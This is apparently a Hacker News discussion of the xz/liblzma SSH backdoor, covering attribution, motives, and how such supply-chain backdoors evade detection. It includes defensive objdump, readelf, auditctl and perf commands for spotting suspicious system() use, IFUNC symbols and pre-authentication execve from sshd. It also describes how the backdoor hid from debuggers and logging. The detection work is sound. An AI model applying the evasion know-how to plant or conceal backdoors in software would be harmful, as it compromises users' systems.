I’ve been building Packj [1] to detect malicious PyPI/NPM/Ruby/PHP/etc. dependencies using behavioral analysis. It uses static+dynamic code analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect bad actors (e.g., typo squatting).
1. https://github.com/ossillate-inc/packj
At least for some comic relief I'd like to imagine Jia's boss slapping him and saying something like "you idiot, we worked on this for so many years and you couldn't have checked for any perf issues?"
But seriously, we could have found ourselves with this in all stable repos: RHEL, Debian, Ubuntu, IoT devices 5 years from now and it would have been a much larger shit show.
Maybe they didn't have time to test? They could have been scrambling to make it into timed releases such as Ubuntu 24.04 or Fedora 40.
There is one possible time pressure involved, which is that libsystemd dropped the liblzma dependency
Absolutely no intelligence agency would look at a successful compromise where they have a highly positioned agent in an organization like this, and burn them by trying to rush in an under-developed exploit that would then become useless almost immediately (because the liblzma dependency would be dropped in the next distro upgrade cycle).
If you had a human asset with decision-making authority and trust in place, then as a funded organization with regular working hours, you'd simply can the project and start prototyping new potential uses.
Might a time-sensitive high-priority goal override such reasoning? For example, the US presidential election is coming up. Making it into Ubuntu LTS could be worth the risk if valuable government targets are running that.
Jia Tan tried to get his backdoored XZ into Ubuntu 24.04 just before the freeze, so that makes sense. Now is about the right time to get it into Fedora if he wants to backdoor RHEL 10, too.
But I don't think valuable government targets are in any hurry to upgrade. I wouldn't expect widespread adoption of 24.04, even in the private sector, until well after the U.S. election.
By the next election, though, everyone will be running it.
Edit: According to another comment [1], there would only have been a short window of vulnerability during which this attack would have worked, due to changes in systemd. This might have increased pressure on the attacker to act quickly.
[1] https://news.ycombinator.com/item?id=39881465
No true Scotsman
Presumably this intelligence agency have multiple such initiatives and can afford to burn one to achieve a goal.
On the other hand, this was a two year long con..
Surely this is something the FBI should be involved with? Or some authority?
sure. what makes you think they aren't?
Why would the FBI investigate the NSA? We have zero idea who the actors involved are.
It's not actually unusual for three-letter US agencies to be at odds with one another.
But one possible reason is if the FBI is convinced that something the NSA is doing is illegal. They may not always be inclined to tolerate that.
You would have to agree that it was possible for the government to break the law. And what the repercussions are when that happens.
I'd noticed that; this seems to have been the case for a long time. You'd think that having state security agencies at war with one-another would be a disaster, but perhaps it's a feature: a sort of social "layered security". At any rate, it seems much better than having a bunch of state security agencies that all sing from the same songsheet.
my comment allows for the NSA to be involved in this and for the FBI to not be investigating them.
Probably the FBI for the public part of it, but if this wasn't a US owned operation you can be sure the CIA/NSA/military will do their own investigation.
This was the backdoor we found. We found the backdoor with performance issues.
What's more likely - that this is the only backdoor like this in Linux, or that there are more out there and this is the one we happened to find?
I really hope someone is out there testing for all of this stuff in linux:
- Look for system() calls in compiled binaries and check all of them (a rough sketch of this and the next check follows below)
- Look for uses of IFUNC - specifically when a library uses IFUNC to replace other functions in the resulting executable
- Make a list of all the binaries / libraries which don't use Landlock. Grep the source code of all those projects and make sure none of them expect to be using Landlock.
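A very rough sketch of the first two checks, using nothing but binutils (paths are Debian-style placeholders, and this only finds unobfuscated references, which this backdoor deliberately avoided):
```
# Libraries whose dynamic symbol table imports system():
for f in /usr/lib/x86_64-linux-gnu/*.so*; do
  objdump -T "$f" 2>/dev/null | grep -q '\*UND\*.* system$' && echo "$f"
done

# Symbols resolved through IFUNC in a given library:
readelf -W --dyn-syms /usr/lib/x86_64-linux-gnu/liblzma.so.5 | grep IFUNC
```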
All of this was obfuscated. None of this will be detectable with current static analysis techniques.
IFUNC and landlock could be debugged pretty easily at runtime, just by adding some instrumentation.
Think about backdoors that are already present and will never be found out.
If the exploit wasn't being used, the odds would be pretty low. They picked the right place to bury it (i.e., effectively outside the codebase, where no auditor ever looks).
That said, if you're not using it, it defeats the purpose. And the more you're using it, the higher the likelihood you will be detected down the line. Compare to Solarwinds.
I suspect I could have used this exact attack against 10,000 random SSH servers spread all over the world, and not be detected.
Most people don't log TCP connections, and those that do don't go through their logs looking for odd certificates in ssh connections.
And no common logging at the ssh/pam level would have picked this up.
Your only chance is some sysadmin who has put 'tripwires' on certain syscalls like system(), fork() or mmap() looking for anything unusual.
Even then, they might detect the attack, yet have no chance at actually finding how the malicious code loaded itself.
There is no ‘system()’ syscall, and fork/exec would be extremely common for opensshd — it’s what it does to spawn new shells which go on to do anything.
I’m not arguing with the point, but this is a great place to hide — very difficult to have meaningful detection rules even for a sophisticated sysadmin.
This would be an execve() that did not go through the PAM dance and ended up as a privileged process.
I _think_ it'll look very different in ps --forest output.
It’s true that there’s a precise set of circumstances that would be different for the RCE (the lack of a PAM dance prior, same process group & session, no allocation of a pseudo-terminal, etc.). My point was merely that I don’t think they are commonly encoded in rule sets or detection systems.
It’s certainly possible, but my guess is sshd is likely to have a lot of open policy. I’m really curious if someone knows different and there are hard detection for those things. (Either way, I bet there will be in the future!)
I am trying to figure out if auditctl is expressive enough to catch unexpected execve() from sshd: basically anything other than /usr/bin/sshd (for privsep) executed with auid=-1 should be suspicious.
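Something along these lines might be a starting point (a sketch, not a vetted rule: field support differs between audit versions, and for execve the exe field may reflect the new image rather than the caller, which is exactly the kind of thing that needs testing):
```
# Flag execve() from the sshd binary while no login session exists yet
# (auid still unset), then review any hits.
auditctl -a always,exit -F arch=b64 -S execve \
         -F exe=/usr/sbin/sshd -F auid=-1 -k sshd_preauth_exec
ausearch -k sshd_preauth_exec
```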
With sufficient data points, you can do A/B and see that all affected systems run a specific version of Linux distro, and eventually track it down to a particular package.
Unless you're the bad actor, you have no way to trigger the exploit, so you can't really do an a/b test. You can only confirm which versions of which distros are vulnerable. And that assumes you have sufficient instrumentation in place to know the exploit has been triggered.
Even then, who actually has a massive fleet of publicly exposed servers all running a mix of distros/versions? You might run a small handful of distros, but I suspect anyone running a fleet large enough to actually collect a substantial amount of data probably also has tools to upgrade the whole fleet (or at least large swaths) in one go. Certainly there are companies where updates are the wild west, but the odds that they're all accessible to and controllable by a single motivated individual who can detect the exploit is essentially zero.
There are those who run sshd on a non-standard port and log all attempts to connect to the standard port though.
Not if this was injected by a state actor. My experience with other examples of state actor interference in critical infrastructure, is that the exploit is not used. It’s there as a capability to be leveraged only in the context of military action.
And that leads to the question:
Why do non-friendly state actors (apparently) not detect and eliminate exploits like this one?
Supposedly, they should have the same kind of budgets for code review (or even more, if we combine all budgets of all non-friendly state actors, given the fact that we are talking about open-source code).
How do you know they don't?
When a state actor says "We found this exploit", people will get paranoid and wonder whether the fix is actually an exploit.
Not saying it happened in this case, but it's really easy for a state actor to hide an extensive audit behind some parallel construction. Just create a cover story pretending to be a random user who randomly noticed ssh logins being slow, and use that story to point maintainers to the problem, without triggering anyone's paranoia, or giving other state actors evidence of your auditing capabilities.
If a government is competent enough to detect this, they're competent enough to add it to their very own cyberweapon stockpile.
They wouldn't be able to do that for this particular exploit since it requires successfully decrypting data encrypted by the attacker's secret key. A zero day caused by an accidental bug though? There's no reason for them to eliminate the threat by disclosing it. They can patch their own systems and add yet another exploit to their hoard.
Hmmh, brings up the question, if no exploit actually occurred, was a crime committed? Can't the authors claim that they were testing how quickly the community of a thousand eyes would react, you know, for science?
That's like asking if someone who went into a crowded place with a fully automatic weapon and started shooting at people while "purposefully missing" is just testing how fast law enforcement reacts, you know, for science.
After something like 2 years of planning this out and targeted changes this isn't something "just done for science".
Or is it rather like someone posting a video on youtube on how to pick a common lock?
And what about the fellows at the University of Minnesota?
It’s more analogous to getting hired at the lock company and sabotaging the locks you assemble to be trivially pickable if you know the right trick.
The University of Minnesota case is an interesting one to compare to. I could imagine them being criminally liable but being given a lenient punishment. I wonder if the law will end up being amended to better cover this, if it isn’t already explicitly illegal.
Well, software supply chains are a thing.
"where no auditor ever is paid to look" would be more correct.
Not always. Weapons of war are most useful when you don't have to actually use them, because others know that you have it. This exploit could be used sparingly to boost a reputation of a state-level actor. Of course, other parties wouldn't know about this particular exploit, but they would see your cyber capabilities in the rare occasions where you decided to use it.
The purpose would presumably be to use this about an hour before the amphibious assault on $WHEREVER begins
Having worked for about a year in an environment that was exposed to a high volume of malevolent IT actors (and some pretty scary ones), I'd say: the chances of discovery were always pretty high.
Keeping a veil of secrecy requires an unimaginable amount of energy. The same goes for keeping the story consistent. One little slip and everything comes to nothing. Sometimes a single sentence can start a chain reaction and uncover a meticulously crafted plan.
That’s how crime is fought every day. And whereas police work has limited resources, software is analyzed daily by hobbyists as a hobby, by professionals who still do it as a hobby, and by professionals for professional reasons.
Discovery was bound to happen eventually.
The XZ attack was very well executed - a masterpiece. I wouldn't be surprised if some state agency were involved. But it was also incredibly lucky that it was found. I know for sure that I, and many of my colleagues, would have gone down a long investigative path had we found any of the issues that are flagged right now.
One takeaway is that finding such an issue would be practically impossible if xz/liblzma weren't open source (and yes, I am also aware that being open source enabled it in the first place), but imagine this existing in Windows or macOS.
it took roughly two years including social engineering.
I'd say the same approach is much easier in a big software company.
How do you mean?
I bet in the majority of cases, there's no need to pressure for merging.
In a big company it's much easier to slip it in. Code seemingly less relevant for security is often not reviewed by a lot of people. Also, often people don't really care and just sign it off without a closer look.
And when it's merged, no one will ever look at it again, unlike with FOSS.
I think you nailed it.
I've read about workplaces that were compromised with multiple people - they would hire a compromised manager, who would then install one or two developers, and shape the environment for them to prevent discovery, which would make these kind of exploits trivial.
so, Office Space?
Since a liblzma backdoor could be used to modify compiler packages that are installed on some distributions, it gets right back to a trusting trust attack.
Although initial detection via e.g. strace would be possible, if the backdoor were later removed or went quiescent, it would be full trusting-trust territory.
How would this be possible? This backdoor works because lzma is loaded into sshd (by a roundabout method involving systemd). I don't think gcc or clang links lzma.
To be fair neither does sshd. But I'm sure someone somewhere has a good reason for gcc to write status via journald or something like that? There's however no reason to limit yourself to gcc for a supply chain attack like this.
In any non trivial build system, there's going to be lots of third party things involved. Especially when you include tests in the build. Is Python invoked somewhere along the build chain? That's like a dozen libraries loaded already.
Nothing is gained from protecting against an exact replica of this attack, but from this family of attacks.
servers hosting gcc binaries are accessed using ssh
dpkg-deb is linked with liblzma
When the backdoor is loaded by sshd it could modify the gcc/clang install, or some system header file.
I think this would’ve been difficult to catch because the patching of sshd happens during linking, when it’s permissible, and if this is correct then it’s not a master key backdoor, so there is no regular login audit trail. And sshd would of course be allowed to start other processes. A very tight SELinux policy could catch sshd executing something that ain’t a shell but hardening to that degree would be extremely rare I assume.
As for being discovered outside the target, well we tried that exercise already, didn’t we? A bunch of people stared at the payload with valgrind et al and didn’t see it. It’s also fairly well protected from being discovered in debugging environments, because the overt infrastructure underlying the payload is incompatible with ASan and friends. And even if it is linked in, the code runs long before main(), so even if you were prodding around near or in liblzma with a debugger you wouldn’t normally observe it execute.
e: sibling suggests strace, yes you can see all syscalls after the process is spawned and you can watch the linker work. But from what I’ve gathered the payload isn’t making any syscalls at that stage to determine whether to activate, it’s just looking at argv and environ etc.
One idea may be to create a patched version of ld-linux itself with added sanity checks while the process loads.
For something much more heavy-handed, force the pages in sensitive sections to fault, either in the kernel or in a hypervisor. Then look at where the access is coming from in the page fault handler.
I don't think you can reliably differentiate a backdoor executing a command, and a legitimate user logged in with ssh running a command once the backdoor is already installed. But the way backdoors install themselves is where they really break the rules.
Huh, ssh executes things that aren't shells all the time during normal operation. No? i.e. 'ssh myserver.lan cat /etc/fstab'
Can I ask for why it wouldn't have been discovered if the obvious delay wasn't present? Wouldn't anyone profiling a running sshd (which I have to imagine someone out there is doing) see it spending all its crypto time in liblzma?
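For what it's worth, a spot check like that is cheap to run (a sketch; though as the next comment notes, the backdoor avoided activating under the conditions a profiler or debugger would typically run under):
```
# Watch live where CPU time goes while an SSH login is in progress;
# liblzma dominating a public-key handshake would stand out.
perf top -g

# Or record system-wide for 30 seconds and look for lzma frames afterwards:
perf record -a -g -- sleep 30
perf report --stdio | grep -i lzma
```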
The situation certainly wouldn't be helped by the fact that this exploit targeted the systemd integration used by Debian and Red Hat. OpenSSH developers aren't likely to run that since they already rejected that patch for the increased attack surface. Hard to argue against, in retrospect. The attack also avoids activation under those conditions a profiler or debugger would run under.
I think one interesting corollary here is how the Ken Thompson attack was discovered at PWB[0] because it had a memory performance bug[1].
Using a jump host could help, only allowing port forwarding. Ideally it would be heavily monitored and create a new instance for every connection (e.g., inside a container).
The attacker would then be stuck inside the jump host and would have to probe where to connect next. This hopefully would then trigger an alert, causing some suspicion.
A shared instance would allow the attacker to just wait for another connection and then follow its traces, without risking triggering an alert by probing.
The ideal jump host would allow freezing the running ssh process on an alert, either with a snapshot (VM-based) or checkpointing (container-based), so it can be analyzed later.
Backdoors can be placed in any type of software. For example, a GIMP plugin could connect to your display and read keystrokes, harvest passwords, etcetera. Utilities run by the superuser are of course even more potentially dangerous. Supply-chain attacks like these are just bound to happen. Perhaps not as often in SSH which is heavily scrutinized, but the consequences can be serious nevertheless.